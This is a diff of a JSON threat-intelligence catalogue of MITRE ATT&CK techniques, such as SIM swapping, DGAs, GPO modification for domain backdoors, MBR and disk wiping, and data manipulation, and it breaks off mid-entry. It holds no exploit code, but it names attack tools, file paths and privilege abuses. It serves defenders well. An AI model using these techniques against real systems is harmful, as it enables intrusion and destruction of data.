"https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-22.html", "http://www.dos.ny.gov/consumerprotection/scams/att-sim.html", + "https://motherboard.vice.com/en_us/article/3ky5a5/criminals-recruit-telecom-employees-sim-swapping-port-out-scam", "http://betanews.com/2016/02/12/everything-you-need-to-know-about-sim-swap-scams/", "https://www.theguardian.com/money/2016/apr/16/sim-swap-fraud-mobile-banking-fraudsters", - "https://motherboard.vice.com/en_us/article/3ky5a5/criminals-recruit-telecom-employees-sim-swapping-port-out-scam", - "https://motherboard.vice.com/en_us/article/vbqax3/hackers-sim-swapping-steal-phone-numbers-instagram-bitcoin" + "https://motherboard.vice.com/en_us/article/vbqax3/hackers-sim-swapping-steal-phone-numbers-instagram-bitcoin", + "https://krebsonsecurity.com/2018/05/t-mobile-employee-made-unauthorized-sim-swap-to-steal-instagram-account/", + "https://techcrunch.com/2017/08/23/i-was-hacked/" ] }, "uuid": "a64a820a-cb21-471f-920c-506a2ff04fa5", "value": "SIM Card Swap - T1451" }, { - "description": "An iOS application may be able to maliciously claim a URL scheme, allowing it to intercept calls that are meant for a different application. This technique, for example, could be used to capture OAuth authorization codes as described in (Citation: IETF-PKCE) or to phish user credentials as described in (Citation: MobileIron-XARA). Related potential security implications are described in (Citation: Dhanjani-URLScheme). FireEye researchers describe URL scheme hijacking in a blog post (Citation: FireEye-Masque2), including evidence of its use.", + "description": "An iOS application may be able to maliciously claim a URL scheme, allowing it to intercept calls that are meant for a different application(Citation: FireEye-Masque2)(Citation: Dhanjani-URLScheme). This technique, for example, could be used to capture OAuth authorization codes(Citation: IETF-PKCE) or to phish user credentials(Citation: MobileIron-XARA).", "meta": { "external_id": "AUT-10", "kill_chain": [ @@ -5663,17 +5871,17 @@ "refs": [ "https://attack.mitre.org/techniques/T1415", "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-10.html", - "https://tools.ietf.org/html/rfc7636", - "https://www.mobileiron.com/en/smartwork-blog/ios-url-scheme-hijacking-xara-attack-analysis-and-countermeasures", + "https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html", "http://www.dhanjani.com/blog/2010/11/insecure-handling-of-url-schemes-in-apples-ios.html", - "https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html" + "https://tools.ietf.org/html/rfc7636", + "https://www.mobileiron.com/en/smartwork-blog/ios-url-scheme-hijacking-xara-attack-analysis-and-countermeasures" ] }, "uuid": "8f142a25-f6c3-4520-bd50-2ae3ab50ed3e", "value": "URL Scheme Hijacking - T1415" }, { - "description": "A malicious app can register to receive intents meant for other applications and may then be able to receive sensitive values such as OAuth authorization codes as described in (Citation: IETF-PKCE).", + "description": "A malicious app can register to receive intents meant for other applications and may then be able to receive sensitive values such as OAuth authorization codes(Citation: IETF-PKCE).", "meta": { "external_id": "T1416", "kill_chain": [ @@ -5780,7 +5988,7 @@ "value": "Spearphishing via Service - T1194" }, { - "description": "Supply chain compromise is the manipulation of products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise can take place at any stage of the supply chain including:\n\n* Manipulation of development tools\n* Manipulation of a development environment\n* Manipulation of source code repositories (public or private)\n* Manipulation of software update/distribution mechanisms\n* Compromised/infected system images (multiple cases of removable media infected at the factory)\n* Replacement of legitimate software with modified versions\n* Sales of modified/counterfeit products to legitimate distributors\n* Shipment interdiction\n\nWhile supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011)", + "description": "Supply chain compromise is the manipulation of products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. \n\nSupply chain compromise can take place at any stage of the supply chain including:\n\n* Manipulation of development tools\n* Manipulation of a development environment\n* Manipulation of source code repositories (public or private)\n* Manipulation of source code in open-source dependencies\n* Manipulation of software update/distribution mechanisms\n* Compromised/infected system images (multiple cases of removable media infected at the factory)\n* Replacement of legitimate software with modified versions\n* Sales of modified/counterfeit products to legitimate distributors\n* Shipment interdiction\n\nWhile supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise)", "meta": { "external_id": "CAPEC-439", "kill_chain": [ @@ -5800,10 +6008,11 @@ "https://capec.mitre.org/data/definitions/437.html", "https://capec.mitre.org/data/definitions/438.html", "https://capec.mitre.org/data/definitions/439.html", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf", "https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities", "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/", - "https://www.commandfive.com/papers/C5_APT_SKHack.pdf" + "https://www.commandfive.com/papers/C5_APT_SKHack.pdf", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf", + "https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets" ] }, "uuid": "3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", @@ -6261,7 +6470,7 @@ "value": "Conduct active scanning - T1254" }, { - "description": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, and architecture.\n\nOn Android, much of this information is programmatically accessible to applications through the android.os.Build class (Citation: Android-Build).\n\nOn iOS, techniques exist for applications to programmatically access this information, for example as described in (Citation: StackOverflow-iOSVersion).", + "description": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, and architecture.\n\nOn Android, much of this information is programmatically accessible to applications through the android.os.Build class(Citation: Android-Build).\n\nOn iOS, techniques exist for applications to programmatically access this information(Citation: StackOverflow-iOSVersion).", "meta": { "external_id": "T1426", "kill_chain": [ @@ -6310,6 +6519,34 @@ "uuid": "78e41091-d10d-4001-b202-89612892b6ff", "value": "Identify supply chains - T1246" }, + { + "description": "Adversaries may attempt to gather information on domain trust relationships that may be used to identify [Lateral Movement](https://attack.mitre.org/tactics/TA0008) opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1178), [Pass the Ticket](https://attack.mitre.org/techniques/T1097), and [Kerberoasting](https://attack.mitre.org/techniques/T1208).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the DSEnumerateDomainTrusts() Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)", + "meta": { + "external_id": "T1482", + "kill_chain": [ + "mitre-attack:discovery" + ], + "mitre_data_sources": [ + "PowerShell logs", + "API monitoring", + "Process command-line parameters", + "Process monitoring" + ], + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1482", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc759554(v=ws.10)", + "https://adsecurity.org/?p=1588", + "http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/ ", + "https://www.microsoft.com/security/blog/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/", + "https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectory.domain.getalltrustrelationships?redirectedfrom=MSDN&view=netframework-4.7.2#System_DirectoryServices_ActiveDirectory_Domain_GetAllTrustRelationships" + ] + }, + "uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "value": "Domain Trust Discovery - T1482" + }, { "description": "Adversaries may attempt to exploit enterprise servers, workstations, or other resources over the network. This technique may take advantage of the mobile device's access to an internal enterprise network either through local connectivity or through a Virtual Private Network (VPN).", "meta": { @@ -6359,6 +6596,31 @@ "uuid": "74a3288e-eee9-4f8e-973a-fbc128e033f1", "value": "Conduct social engineering - T1249" }, + { + "description": "Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making. \n\nStored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", + "meta": { + "external_id": "T1492", + "kill_chain": [ + "mitre-attack:impact" + ], + "mitre_data_sources": [ + "Application logs", + "File monitoring" + ], + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1492", + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.justice.gov/opa/press-release/file/1092091/download" + ] + }, + "uuid": "0bf78622-e8d2-41da-a857-731472d61a92", + "value": "Stored Data Manipulation - T1492" + }, { "description": "Supply chains include the people, processes, and technologies used to move a product or service from a supplier to a consumer. Understanding supply chains may provide an adversary with opportunities to exploit the people, their positions, and relationships, that are part of the supply chain. (Citation: SmithSupplyChain) (Citation: CERT-UKSupplyChain)", "meta": { @@ -6575,7 +6837,7 @@ "value": "Remotely Install Application - T1443" }, { - "description": "A malicious app could abuse Android's accessibility features to capture sensitive data or perform other malicious actions, as demonstrated in a proof of concept created by Skycure (Citation: Skycure-Accessibility).", + "description": "A malicious app could abuse Android's accessibility features to capture sensitive data or perform other malicious actions(Citation: Skycure-Accessibility).", "meta": { "external_id": "T1453", "kill_chain": [ @@ -6665,6 +6927,42 @@ "uuid": "3911658a-6506-4deb-9ab4-595a51ae71ad", "value": "Commonly Used Port - T1436" }, + { + "description": "Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)\n\nDGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)\n\nAdversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)", + "meta": { + "external_id": "T1483", + "kill_chain": [ + "mitre-attack:command-and-control" + ], + "mitre_data_sources": [ + "Process use of network", + "Packet capture", + "Network device logs", + "Netflow/Enclave netflow", + "DNS records" + ], + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1483", + "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf", + "https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/", + "https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/", + "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html", + "https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html", + "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html", + "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", + "https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/", + "http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf", + "https://arxiv.org/pdf/1611.00791.pdf" + ] + }, + "uuid": "54456690-84de-4538-9101-643e26437e09", + "value": "Domain Generation Algorithms - T1483" + }, { "description": "Adversaries can communicate using cellular networks rather than enterprise Wi-Fi in order to bypass enterprise network monitoring systems. Adversaries may also communicate using other non-Internet Protocol mediums such as SMS, NFC, or Bluetooth to bypass network monitoring systems.", "meta": { @@ -6685,6 +6983,31 @@ "uuid": "b3c2e5de-0941-4b57-ba61-af029eb5517a", "value": "Alternate Network Mediums - T1438" }, + { + "description": "Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making. \n\nManipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", + "meta": { + "external_id": "T1493", + "kill_chain": [ + "mitre-attack:impact" + ], + "mitre_data_sources": [ + "Packet capture", + "Network protocol analysis" + ], + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1493", + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.justice.gov/opa/press-release/file/1092091/download" + ] + }, + "uuid": "cc1e737c-236c-4e3b-83ba-32039a626ef8", + "value": "Transmitted Data Manipulation - T1493" + }, { "description": "Callbacks are malware communications seeking instructions. An adversary will test their malware to ensure the appropriate instructions are conveyed and the callback software can be reached. (Citation: LeeBeaconing)", "meta": { @@ -6748,7 +7071,7 @@ "value": "Malicious SMS Message - T1454" }, { - "description": "As further described in [ATT&CK for Enterprise](https://attack.mitre.org/techniques/T1195), supply chain compromise is the manipulation of products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Somewhat related, adversaries could also identify and exploit inadvertently present vulnerabilities. In many cases, it may be difficult to be certain whether exploitable functionality is due to malicious intent or simply inadvertent mistake.\n\nRelated PRE-ATT&CK techniques include:\n\n* [Identify vulnerabilities in third-party software libraries](https://attack.mitre.org/techniques/T1389) - Third-party libraries incorporated into mobile apps could contain malicious behavior, privacy-invasive behavior, or exploitable vulnerabilities. An adversary could deliberately insert malicious behavior or could exploit inadvertent vulnerabilities. For example, Ryan Welton of NowSecure identified exploitable remote code execution vulnerabilities in a third-party advertisement library (Citation: NowSecure-RemoteCode). Grace et al. identified security issues in mobile advertisement libraries (Citation: Grace-Advertisement).\n* [Distribute malicious software development tools](https://attack.mitre.org/techniques/T1394) - As demonstrated by the XcodeGhost attack (Citation: PaloAlto-XcodeGhost1), app developers could be provided with modified versions of software development tools (e.g. compilers) that automatically inject malicious or exploitable code into applications.", + "description": "As further described in [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195), supply chain compromise is the manipulation of products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Somewhat related, adversaries could also identify and exploit inadvertently present vulnerabilities. In many cases, it may be difficult to be certain whether exploitable functionality is due to malicious intent or simply inadvertent mistake.\n\nRelated PRE-ATT&CK techniques include:\n\n* [Identify vulnerabilities in third-party software libraries](https://attack.mitre.org/techniques/T1389) - Third-party libraries incorporated into mobile apps could contain malicious behavior, privacy-invasive behavior, or exploitable vulnerabilities. An adversary could deliberately insert malicious behavior or could exploit inadvertent vulnerabilities. For example, Ryan Welton of NowSecure identified exploitable remote code execution vulnerabilities in a third-party advertisement library (Citation: NowSecure-RemoteCode). Grace et al. identified security issues in mobile advertisement libraries (Citation: Grace-Advertisement).\n* [Distribute malicious software development tools](https://attack.mitre.org/techniques/T1394) - As demonstrated by the XcodeGhost attack (Citation: PaloAlto-XcodeGhost1), app developers could be provided with modified versions of software development tools (e.g. compilers) that automatically inject malicious or exploitable code into applications.", "meta": { "external_id": "APP-6", "kill_chain": [ @@ -6785,6 +7108,58 @@ "uuid": "8e27551a-5080-4148-a584-c64348212e4f", "value": "Wipe Device Data - T1447" }, + { + "description": "Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. \n\nGroup policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predicable network path \\\\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) \n\nLike other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.\n\nMalicious GPO modifications can be used to implement [Scheduled Task](https://attack.mitre.org/techniques/T1053), [Disabling Security Tools](https://attack.mitre.org/techniques/T1089), [Remote File Copy](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1035) and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs) Publicly available scripts such as New-GPOImmediateTask can be leveraged to automate the creation of a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <GPO_PATH>\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)\n", + "meta": { + "external_id": "T1484", + "kill_chain": [ + "mitre-attack:defense-evasion" + ], + "mitre_data_sources": [ + "Windows event logs" + ], + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1484", + "https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/", + "https://adsecurity.org/?p=2716", + "https://wald0.com/?p=179", + "http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/", + "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf", + "https://www.microsoft.com/security/blog/2016/06/01/hacking-team-breach-a-cyber-jurassic-park/", + "http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/" + ] + }, + "uuid": "ebb42bbe-62d7-47d7-a55f-3b08b61d792d", + "value": "Group Policy Modification - T1484" + }, + { + "description": "Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making. \n\nAdversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1042) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", + "meta": { + "external_id": "T1494", + "kill_chain": [ + "mitre-attack:impact" + ], + "mitre_data_sources": [ + "File monitoring", + "Process monitoring" + ], + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1494", + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.justice.gov/opa/press-release/file/1092091/download" + ] + }, + "uuid": "ca205a36-c1ad-488b-aa6c-ab34bdd3a36b", + "value": "Runtime Data Manipulation - T1494" + }, { "description": "A message sent over a radio interface (typically cellular, but potentially Bluetooth, GPS, NFC, Wi-Fi or other) to the mobile device could exploit a vulnerability in code running on the device.\n\nD. Komaromy and N. Golde demonstrated baseband exploitation of a Samsung mobile device at the PacSec 2015 security conference (Citation: Register-BaseStation).\n\nWeinmann described and demonstrated \"the risk of remotely exploitable memory corruptions in cellular baseband stacks.\" (Citation: Weinmann-Baseband)\n\nPlatforms: Android, iOS", "meta": { @@ -6826,33 +7201,59 @@ "value": "Malicious Media Content - T1457" }, { - "description": "Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)\n\nAdversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords.\n\nSeveral tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder)", + "description": "Adversaries may corrupt or wipe the disk data structures on hard drive necessary to boot systems; targeting specific critical systems as well as a large number of systems in a network to interrupt availability to system and network resources. \n\nAdversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1487) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1488) if all sectors of a disk are wiped.\n\nTo maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)", "meta": { - "external_id": "T1171", + "external_id": "T1487", "kill_chain": [ - "mitre-attack:credential-access" + "mitre-attack:impact" ], "mitre_data_sources": [ - "Windows Registry", - "Packet capture", - "Netflow/Enclave netflow" + "Kernel drivers", + "MBR" ], "mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1487", + "https://www.symantec.com/connect/blogs/shamoon-attacks", + "https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html", + "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf", + "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/" + ] + }, + "uuid": "2e114e45-2c50-404c-804a-3af9564d240e", + "value": "Disk Structure Wipe - T1487" + }, + { + "description": "Adversaries may erase the contents of storage devices on specific systems as well as large numbers of systems in a network to interrupt availability to system and network resources.\n\nAdversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk erased instead of individual files.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: Novetta Blockbuster Destructive Malware)", + "meta": { + "external_id": "T1488", + "kill_chain": [ + "mitre-attack:impact" + ], + "mitre_data_sources": [ + "Kernel drivers", + "Process monitoring", + "Process command-line parameters" + ], + "mitre_platforms": [ + "Linux", + "macOS", "Windows" ], "refs": [ - "https://attack.mitre.org/techniques/T1171", - "https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution", - "https://technet.microsoft.com/library/cc958811.aspx", - "https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning", - "https://github.com/Kevin-Robertson/Conveigh", - "https://github.com/SpiderLabs/Responder", - "https://github.com/nomex/nbnspoof", - "https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response" + "https://attack.mitre.org/techniques/T1488", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf", + "https://www.justice.gov/opa/press-release/file/1092091/download" ] }, - "uuid": "0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0", - "value": "LLMNR/NBT-NS Poisoning - T1171" + "uuid": "b82f7d37-b826-4ec9-9391-8e121c78aed7", + "value": "Disk Content Wipe - T1488" }, { "description": "A payload is the part of the malware which performs a malicious action. The adversary may re-use payloads when the needed capability is already available. (Citation: SonyDestover)", @@ -7040,7 +7441,7 @@ "value": "Multi-hop Proxy - T1188" }, { - "description": "A drive-by compromise is when an adversary gains access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is targeted for exploitation. This can happen in several ways, but there are a few main components: \n\nMultiple ways of delivering exploit code to a browser exist, including:\n\n* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, cross-site scripting.\n* Malicious ads are paid for and served through legitimate ad providers.\n* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).\n\nOften the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring. (Citation: Shadowserver Strategic Web Compromise)\n\nTypical drive-by compromise process:\n\n1. A user visits a website that is used to host the adversary controlled content.\n2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. \n * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.\n3. Upon finding a vulnerable version, exploit code is delivered to the browser.\n4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.\n * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.\n\nUnlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.", + "description": "A drive-by compromise is when an adversary gains access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is targeted for exploitation.\n\nMultiple ways of delivering exploit code to a browser exist, including:\n\n* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, cross-site scripting.\n* Malicious ads are paid for and served through legitimate ad providers.\n* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).\n\nOften the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring. (Citation: Shadowserver Strategic Web Compromise)\n\nTypical drive-by compromise process:\n\n1. A user visits a website that is used to host the adversary controlled content.\n2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. \n * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.\n3. Upon finding a vulnerable version, exploit code is delivered to the browser.\n4. If exploitation 